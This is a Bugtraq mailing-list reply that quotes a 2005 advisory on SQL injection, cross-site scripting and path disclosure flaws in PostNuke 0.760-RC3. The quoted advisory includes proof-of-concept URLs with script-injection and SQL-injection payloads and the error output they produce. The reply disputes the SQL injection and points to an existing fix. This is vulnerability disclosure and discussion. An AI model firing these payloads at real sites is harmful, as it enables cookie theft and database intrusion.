Bugtraq mailing list archives
Re: Sql injection, xss and path disclosure vulnerabilities in PostNuke 0.760-RC3
From: Maksymilian Arciemowicz <max () jestsuper pl>
Date: 8 Apr 2005 21:29:59 -0000
In-Reply-To: <20050408023602.4627.qmail () www securityfocus com>
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Dcrab 's Security Advisory [Hsc Security Group] http://www.hackerscenter.com/ [dP Security] http://digitalparadox.org/ Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah GET INFORMED FIRST ABOUT MY ADVISORIES http://www.digitalparadox.org Severity: Medium Title: Sql injection, xss and path disclosure vulnerabilities in PostNuke 0.760-RC3 Date: 08/04/2005 Vendor: PostNuke Vendor Website: http://www.postnuke.com Summary: There are, sql injection, xss and path disclosure vulnerabilities in postnuke 0.760-rc3. Proof of Concept Exploits: http://localhost/admin.php?module="><script>alert(document.cookie)</script>&op=main&POSTNUKESID=355776cfb622466924a7096d4471a480 Pops cookie http://localhost/modules.php?op=modload&name=News&file=article&sid='SQL_INJECTION&POSTNUKESID=355776cfb622466924a7096d4471a480 SQL INJECTION (look wayyy on the bottom of the page) DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'SQL_INJECTION' at line 23
Are you sure, is that sql injection in 0.760=RC3? Code "article.php": if ((empty($sid) && empty($tid)) || (!is_numeric($sid) && !is_numeric($tid))) { include 'header.php'; echo _MODARGSERROR; include 'footer.php'; exit; } So exit; ;] Bug don't work in 0.760-RC3. And in 0.750 exist path d. --- Fatal error: Cannot redeclare head() (previously declared in /www/PostNuke-0.750/html/header.php:44) in /www/PostNuke-0.750/html/header.php on line 142 ---
http://localhost/modules.php?op=modload&name=Reviews&file=index&req=showcontent&id='&POSTNUKESID=355776cfb622466924a7096d4471a480 Server Path disclosure Fatal error: Call to a member function on a non-object in /home/httpd/vhosts/localhost/httpdocs/modules/Reviews/index.php on line 976 http://localhost/user.php?op="><script>alert(document.cookie)</script>&module=NS-NewUser&POSTNUKESID=355776cfb622466924a7096d4471a480 Pops cookie Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input validation before passing user input to the mysql database, or before echoing data on the screen, would solve these problems. Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah Author: These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/. Lookout or my soon to come out book on Secure coding with php. -----BEGIN PGP SIGNATURE----- Version: PGP 8.1 - not licensed for commercial use: www.pgp.com iQA/AwUBQlXvwyZV5e8av/DUEQKa2QCgiDjVDkjyVdrXhbww/3zI8ksr8/EAnikN BDxd/CIvzHYmLQAyb5suDR8K =7MBl -----END PGP SIGNATURE-----
Frist check CVS. And if you public adv, frist check security contact. You bug: http://cvs.postnuke.com/viewcvs.cgi/Historic_PostNuke_Library/postnuke-devel/html/user.php.diff?r1=1.18&r2=1.19 only xss.
Current thread:
- Sql injection, xss and path disclosure vulnerabilities in PostNuke 0.760-RC3 dcrab (Apr 08)
- <Possible follow-ups>
- Re: Sql injection, xss and path disclosure vulnerabilities in PostNuke 0.760-RC3 Maksymilian Arciemowicz (Apr 12)